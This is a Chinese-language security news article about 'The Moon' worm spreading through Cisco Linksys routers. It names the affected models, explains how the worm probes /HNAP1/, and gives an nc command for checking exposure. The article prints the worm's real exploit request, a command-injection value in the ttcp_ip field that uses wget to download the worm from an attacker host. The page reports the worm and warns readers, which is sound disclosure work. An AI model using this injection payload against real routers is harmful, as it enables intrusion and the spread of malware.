诚创科技
网站地图 | 联系我们 | English | 繁体                            免费咨询热线:4006-770-660

不管黑猫白猫,能监管上网就是e猫

      产品介绍       新闻简讯       产品购买       技术服务       反馈沟通       关于我们

新闻聚焦
销售案例
经验交流
网管软件
传输监控
屏蔽软件
产品注册


  您现在的位置:主页 > 新闻简讯 >

Cisco Linksys路由器蠕虫The Moon正在蔓延

2019-07-23 08:30:08 来源:www.xmcct.com

作为互联网的入口,家用路由器越来越被业界所重视。路由器更加智能了,路由器的安全也会更加多样化。近日,国外安全研究者发布路由器蠕虫预警。根

 作为互联网的入口,家用路由器越来越被业界所重视。路由器更加智能了,路由器的安全也会更加多样化。近日,国外安全研究者发布Linksys路由器蠕虫预警。根据路由器的固件版本,Cisco Linksys E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000,E900等型号存在被蠕虫感染的风险。这个蠕虫首先连接路由器的8080端口,请求“/HNAP1/”这个路径。linksys路由器会返回一个包含路由器特性和固件版本的xml文档。<ModelName>E2500</ModelName><FirmwareVersion>1.0.07 build 1</FirmwareVersion>这是E2500型号返回的固件相关信息。之后,蠕虫会发送一个特定的请求到存在漏洞的路由器,这个请求会导致路由器执行一段shell脚本,从而感染蠕虫。第二次的请求如下:submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h`cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`&StartEPI=1一旦被蠕虫感染,路由器就会扫描其他的ip,这个蠕虫内置了大约670个不同国家的家用网段。而且被感染的路由器在短时间内会作为http服务器供其他被感染的路由器下载蠕虫代码。目前尚不清楚这个蠕虫网络是否存在命令和控制频道。当前它的行为仅仅是传播。研究者在蠕虫的文件中发现了电影《The Moon》的相关图片,所以被命名为The Moon。可以通过以下命令来检测自己的路由器是否存在漏洞:echo "GET /HNAP1/ HTTP/1.1 Host: test " | nc routerip 8080如果或得了xml格式的返回数据,那么你的路由器很可能存在漏洞,有被蠕虫感染的风险。[编译整理by litdg@freebuf] 

上一篇:Anonymous黑客组织启动OnionIRC项目,向世界传递黑客精神
下一篇:白帽黑客入侵少妇摄像头:连表情都一清二楚

版权所有:厦门诚创科技有限公司 Copyright © 2003-2014
若有意见和建议,请您E-mail:网站管理员
闽ICP备05004597号